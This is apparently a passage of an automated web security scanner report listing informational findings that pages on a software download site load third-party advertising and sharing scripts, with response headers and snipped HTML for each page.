21.1329. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1330. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1331. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1332. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1333. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1334. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1335. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1336. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1337. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1338. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1339. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1340. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1341. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1342. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1343. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1344. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
